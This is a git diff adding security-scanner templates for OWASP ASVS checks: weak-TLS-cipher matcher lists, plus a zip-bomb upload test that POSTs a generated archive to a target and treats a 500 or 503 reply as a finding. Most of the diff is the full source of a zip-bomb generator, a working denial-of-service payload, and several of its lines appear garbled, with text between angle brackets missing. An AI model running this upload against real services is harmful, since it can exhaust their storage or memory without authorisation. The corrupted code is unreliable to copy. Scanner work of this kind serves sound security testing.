"TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml index fd5bf0e..325c9f2 100644 --- a/templates/9.1.3.yaml +++ b/templates/9.1.3.yaml @@ -5,7 +5,7 @@ info: author: righettod,forgedhallpass,RezaSaeedi severity: low reference: - - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security - https://wiki.mozilla.org/Security/Server_Side_TLS - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html - https://ssl-config.mozilla.org/#config=intermediate diff --git a/templates/code/12.1.1.2.yaml b/templates/code/12.1.1.2.yaml new file mode 100644 index 0000000..62b4987 --- /dev/null +++ b/templates/code/12.1.1.2.yaml @@ -0,0 +1,59 @@ +id: ASVS-4-0-3-V12-1-1-2 + +info: + name: ASVS 12.1.1.2 (Zipbomb) Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://github.com/ZerosunGitHub/zipbomb + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + +variables: + mode: "quoted_overlap" + num-files: 250 + compressed-size: 21179 + +code: + - engine: + - py + - python + - python3 + source: | + import subprocess + import sys + import os + + mode = os.getenv('mode') + num_files = os.getenv('num-files') + compressed_size = os.getenv('compressed-size') + subprocess.run([sys.executable, "code/source/zipbomb.py", f"--mode={mode}", f"--num-files={num_files}", f"--compressed-size={compressed_size}"]) + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="zipbomb.zip" + Content-Type: application/zip + + {{code_response}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + matchers: + - type: status + name: status_code + status: + - 500 + - 503 +# digest: 490a0046304402203b8787953e9fa8a0e551fc309787addc534c07c2b32f3665f6b307fb8e4cc28802206af2bc67ad42c54ee002eb47b45765e2417ac7bc1ee88414ac0c5c8352bacec1:99354b7c2d97285abe7401b783fba350 \ No newline at end of file diff --git a/templates/code/source/zipbomb.py b/templates/code/source/zipbomb.py new file mode 100644 index 0000000..70a3525 --- /dev/null +++ b/templates/code/source/zipbomb.py @@ -0,0 +1,768 @@ +#!/usr/bin/env python3 + +import binascii +import bz2 +import getopt +import math +import struct +import sys +import zipfile + + +CHOSEN_BYTE = ord(b"a") # homage to 42.zip + + +# CRC-32 precomputation using matrices in GF(2). Similar to crc32_combine in +# zlib. See https://stackoverflow.com/a/23126768 for a description of the idea. +# Here, we use a 33-bit state where the dummy 33rd coordinate is always 1 +# (similar to homogeneous coordinates). Matrices are represented as 33-element +# lists, where each element is a 33-bit integer representing one column. + +CRC_POLY = 0xedb88320 + +def matrix_mul_vector(m, v): + r = 0 + for shift in range(len(m)): + if (v>>shift) & 1 == 1: + r ^= m[shift] + return r + +def matrix_mul(a, b): + assert len(a) == len(b) + return [matrix_mul_vector(a, v) for v in b] + +def identity_matrix(): + return [1<>shift)&1], m) + return m + +def precompute_crc_matrix_repeated(data, n): + accum = precompute_crc_matrix(data) + # Square-and-multiply algorithm to compute m = accum^n. + m = identity_matrix() + while n > 0: + if n & 1 == 1: + m = matrix_mul(m, accum) + accum = matrix_mul(accum, accum) + n >>= 1 + return m + +def crc_matrix_apply(m, value=0): + return (matrix_mul_vector(m, (value^0xffffffff)|(1<<32)) & 0xffffffff) ^ 0xffffffff + + +# DEFLATE stuff, see RFC 1951. + +class BitBuffer: + def __init__(self): + self.done = [] + self.current = 0 + self.bit_pos = 0 + + def push(self, x, n): + assert x == x % (1<= (8 - self.bit_pos): + self.current |= (x << self.bit_pos) & 0xff + x >>= (8 - self.bit_pos) + n -= (8 - self.bit_pos) + self.done.append(self.current) + self.current = 0 + self.bit_pos = 0 + self.current |= (x << self.bit_pos) & 0xff + self.bit_pos += n + + def push_rev(self, x, n): + mask = (1<>1 + while mask > 0: + self.push(x&mask != 0 and 1 or 0, 1) + mask >>= 1 + + def bytes(self): + out = bytes(self.done) + if self.bit_pos != 0: + out += bytes([self.current]) + return out + +# RFC 1951 section 3.2.2. Input is a sym: length dict and output is a +# sym: (code, length) dict. +def huffman_codes_from_lengths(sym_lengths): + bl_count = {} + max_length = 0 + for _, length in sym_lengths.items(): + bl_count.setdefault(length, 0) + bl_count[length] += 1 + max_length = max(max_length, length) + + next_code = {} + code = 0 + for length in range(max_length): + code = (code + bl_count.get(length, 0)) << 1 + next_code[length+1] = code + + result = {} + for sym, length in sorted(sym_lengths.items(), key=lambda x: (x[1], x[0])): + assert next_code[length] >> length == 0, (sym, bin(next_code[length]), length) + result[sym] = next_code[length], length + next_code[length] += 1 + return result + +def print_huffman_codes(sym_codes, **kwargs): + max_sym_length = max(len("{}".format(sym)) for sym in sym_codes) + for sym, code in sorted(sym_codes.items()): + code, length = code + print("{:{}}: {:0{}b}".format(sym, max_sym_length, code, length), **kwargs) + +# RFC 1951 section 3.2.5. Returns a tuple (code, extra_bits, num_extra_bits). +def code_for_length(length): + if length < 3: + return None, None, None + elif length < 11: + base_code, base_length, num_bits = 257, 3, 0 + elif length < 19: + base_code, base_length, num_bits = 265, 11, 1 + elif length < 35: + base_code, base_length, num_bits = 269, 19, 2 + elif length < 67: + base_code, base_length, num_bits = 273, 35, 3 + elif length < 131: + base_code, base_length, num_bits = 277, 67, 4 + elif length < 258: + base_code, base_length, num_bits = 281, 131, 5 + else: + raise ValueError(length) + return base_code + ((length - base_length) >> num_bits), (length - base_length) & ((1<= 11: + if n < 138: + x = n + elif n < 138 + 11 and code_length_lengths[18] < (n - 138) * code_length_lengths[0]: + # It'll be cheaper to cut this 18 block short and do the + # remainder with another full 18 block. + x = n - 11 + else: + x = 138 + bits.push_rev(*code_length_codes[18]) # 7 bits of length to follow + bits.push(x - 11, 7) + n -= x + while n > 0: + bits.push_rev(*code_length_codes[0]) + n -= 1 + # Output a Huffman tree in terms of code lengths. + def output_code_length_tree(sym_lengths): + cur = 0 + for sym, length in sorted(sym_lengths.items()): + skip(sym - cur) + bits.push_rev(*code_length_codes[length]) + cur = sym + 1 + + # Output Huffman tree for literal/length values. + output_code_length_tree(ll_lengths) + + # Output Huffman tree for distance codes. + output_code_length_tree(distance_lengths) + + n = 0 + # A literal byte to start the whole process. + bits.push_rev(*ll_codes[repeated_byte]) + n += 1 + + # Now every pair of 0 bits encodes 258 copies of repeated_byte. + is_even = bits.bit_pos % 2 == 0 + # Including whatever zero bits remain at the end of the bit buffer. + n += (8 - bits.bit_pos + 1) // 2 * 258 + + prefix = bits.bytes() + + bits = BitBuffer() + if not is_even: + bits.push(*distance_codes[0]) + if max_uncompressed_size is not None: + # Push bytes to get within 258 of the max we are allowed. + while (max_uncompressed_size - n) % 1032 >= 258: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + else: + # Push the stream-end code (256) as far back in the byte as possible. + while bits.bit_pos + ll_lengths[285] + distance_lengths[0] + ll_lengths[256] <= 8: + bits.push_rev(*ll_codes[285]) + bits.push(*distance_codes[0]) + n += 258 + bits.push_rev(*ll_codes[256]) + suffix = bits.bytes() + + if max_uncompressed_size is not None: + num_zeroes = (max_uncompressed_size - n) // 1032 + else: + num_zeroes = compressed_size - len(prefix) - len(suffix) + + n += num_zeroes * 1032 + body = b"\x00" * num_zeroes + + compressed_data = prefix + body + suffix + + if max_uncompressed_size is not None: + assert (max_uncompressed_size - n) < 258, (n, max_uncompressed_size) + else: + assert len(compressed_data) == compressed_size, (len(compressed_data), compressed_size) + + return compressed_data, n, precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + + +# bzip2 stuff + +def bulk_bzip2(repeated_byte, compressed_size=None, max_uncompressed_size=None): + assert (compressed_size is None and max_uncompressed_size is not None) or (compressed_size is not None and max_uncompressed_size is None) + + # 45899235, empirically determined to be the largest amount of data that + # fits into a 900 kB block after the initial bzip2 RLE (each 255 bytes + # becomes 5 bytes; 45899235 * 5 / 255 = 899985). + # https://en.wikipedia.org/w/index.php?title=Bzip2&oldid=890453143#File_format + # says it can fit 45899236, 1 byte more, but in my tests that results in a + # second block being emitted. + block_uncompressed_size = 45899235 + + # Use an actual bzip2 implementation to compress the entire stream, then + # extract from it a single block that we will repeat. This is actually + # bogus, because whatever follows the block header is not necessarily + # byte-aligned, but the assertions will prevent going ahead if things don't + # work out perfectly. + basic = bz2.compress(bytes([repeated_byte])*block_uncompressed_size, 9) + assert len(basic) == 46, basic + header, block, footer, _ = basic[0:4], basic[4:36], basic[36:42], basic[42:] + assert header == b"BZh9", header + assert block.startswith(b"\x31\x41\x59\x26\x53\x59"), block + assert footer == b"\x17\x72\x45\x38\x50\x90", header + block_crc, = struct.unpack(">L", block[6:10]) + + if compressed_size is not None: + num_blocks = (compressed_size - 4 - 10) // 32 + assert (compressed_size - 4 - 10) % 32 == 0 + else: + num_blocks = max_uncompressed_size // block_uncompressed_size + n = num_blocks * block_uncompressed_size + # 2.2.4 https://github.com/dsnet/compress/blob/master/doc/bzip2-format.pdf + stream_crc = 0 + for i in range(num_blocks): + stream_crc = (block_crc ^ ((stream_crc<<1) | (stream_crc>>31))) & 0xffffffff + + crc_matrix = precompute_crc_matrix_repeated(bytes([repeated_byte]), n) + compressed_data = header + block*num_blocks + footer + struct.pack(">L", stream_crc) + return compressed_data, n, crc_matrix + + +# APPNOTE.TXT 4.4.5 +# 8 - The file is Deflated +COMPRESSION_METHOD_DEFLATE = 8 +# 12 - File is compressed using BZIP2 algorithm +COMPRESSION_METHOD_BZIP2 = 12 + +BULK_COMPRESS = { + COMPRESSION_METHOD_BZIP2: bulk_bzip2, + COMPRESSION_METHOD_DEFLATE: bulk_deflate, +} + +# APPNOTE.TXT 4.4.3.2 +# 2.0 - File is compressed using Deflate compression +ZIP_VERSION = 20 +# 4.5 - File uses ZIP64 format extensions +ZIP64_VERSION = 45 +# 4.6 - File is compressed using BZIP2 compression +ZIP_BZIP2_VERSION = 46 + +MOD_DATE = 0x0548 +MOD_TIME = 0x6ca0 + +def zip_version(compression_method=COMPRESSION_METHOD_DEFLATE, zip64=False): + candidates = [ZIP_VERSION] + if compression_method==COMPRESSION_METHOD_BZIP2: + candidates.append(ZIP_BZIP2_VERSION) + if zip64: + candidates.append(ZIP64_VERSION) + return max(candidates) + +# In Zip64 mode, we add a Zip64 extra field for every file (including using +# ZIP64_VERSION instead of ZIP_VERSION) for *every* file, whether it is large +# enough to need it or not. Past a certain threshold, every file *does* need it +# anyway. It may be slightly better for compatibility to write every file in +# either Zip64 or non-Zip64 mode. See the block comment in putextended in +# zipfile.c of Info-ZIP Zip 3.0 (though the worst incompatibility has to do with +# data descriptors, which we don't use). +# +# Even in Zip64 mode, we make the assumption that the only field that needs to +# be represented in the Zip64 extra info is uncompressed_size, and not +# compressed_size nor local_file_header_offset (checked with an assertion in +# CentralDirectoryHeader.serialize). This is to make analysis easier (central +# directory headers and local file headers continue to have a fixed size), and +# because the zip file has to be really big for either of those fields to exceed +# 4 GiB—the quoted_overlap method can produce a zip file whose total unzipped +# size is greater than 16 EiB (2^64 bytes) without exceeding either of those +# limits. + +class LocalFileHeader: + def __init__(self, compressed_size, uncompressed_size, crc, filename, compression_method=COMPRESSION_METHOD_DEFLATE, extra_tag=None, extra_length_excess=0): + self.compressed_size = compressed_size + self.uncompressed_size = uncompressed_size + self.crc = crc + self.filename = filename + self.compression_method = compression_method + self.extra_tag = extra_tag + self.extra_length_excess = extra_length_excess + + def serialize(self, zip64=False): + # APPNOTE.TXT 4.5.3 says that in the local file header, unlike the + # central directory header, we must include both uncompressed_size and + # compressed_size in the Zip64 extra field, even if one of them is not + # so big as to require Zip64. + extra = b"" + if zip64: + extra += struct.pack(" 0: + extra += struct.pack(" bomb.zip + {program_name} --num-files=N --max-uncompressed-size=N [OPTIONS...] > bomb.zip + +The --num-files option and either the --compressed-size or +--max-uncompressed-size options are required. + + --algorithm=ALG ALG can be "deflate" (default) or "bzip2" + --alphabet=CHARS alphabet for constructing filenames + --compressed-size=N compressed size of the kernel + --extra=HHHH use extra-field quoting with the type tag 0xHHHH + --max-uncompressed-size=N maximum uncompressed size of the kernel + --mode=MODE "no_overlap", "full_overlap", or "quoted_overlap" (default) + --num-files=N number of files to contain, not counting template files + --template=ZIP zip file containing other files to store in the zip bomb + --zip64 enable Zip64 extensions\ +""".format(program_name=sys.argv[0]), file=file) + +def main(): + opts, args = getopt.gnu_getopt(sys.argv[1:], "h", ["algorithm=", "alphabet=", "compressed-size=", "extra=", "help", "max-uncompressed-size=", "mode=", "num-files=", "template=", "zip64"]) + assert not args, args + global FILENAME_ALPHABET + mode = write_zip_quoted_overlap + compression_method = COMPRESSION_METHOD_DEFLATE + compressed_size = None + max_uncompressed_size = None + extra_tag = None + template_filenames = [] + zip64 = False + for o, a in opts: + if o == "--algorithm": + compression_method = { + "bzip2": COMPRESSION_METHOD_BZIP2, + "deflate": COMPRESSION_METHOD_DEFLATE, + }[a] + elif o == "--alphabet": + assert len(set(sorted(a))) == len(a), a + FILENAME_ALPHABET = bytes(a, "utf-8") + elif o == "--compressed-size": + compressed_size = int(a) + elif o == "--extra": + # This is an experimental feature that quotes as many files as + # possible inside the Extra Field of local file headers, rather than + # quoting using DEFLATE non-compressed blocks. The argument is a + # 16-bit hexadecimal tag ID. It should be possible to use any tag ID + # that's unallocated in APPNOTE.TXT 4.5.2. + extra_tag = int(a, 16) + elif o == "--max-uncompressed-size": + max_uncompressed_size = int(a) + elif o == "--mode": + mode = { + "no_overlap": write_zip_no_overlap, + "full_overlap": write_zip_full_overlap, + "quoted_overlap": write_zip_quoted_overlap, + }[a] + elif o == "--num-files": + num_files = int(a) + elif o == "--template": + template_filenames.append(a) + elif o == "--zip64": + zip64 = True + elif o in ("-h", "--help"): + usage() + sys.exit(1) + + if extra_tag is not None and mode != write_zip_quoted_overlap: + print("--extra only makes sense with --mode=quoted_overlap", file=sys.stderr) + sys.exit(1) + + template = [] + for filename in template_filenames: + template.extend(load_template(filename)) + + mode(sys.stdout.buffer, num_files, compressed_size=compressed_size, max_uncompressed_size=max_uncompressed_size, compression_method=compression_method, zip64=zip64, template=template, extra_tag=extra_tag) + +if __name__ == "__main__": + main() diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml new file mode 100644 index 0000000..2d92495 --- /dev/null +++ b/templates/dast/12.3.3.yaml @@ -0,0 +1,47 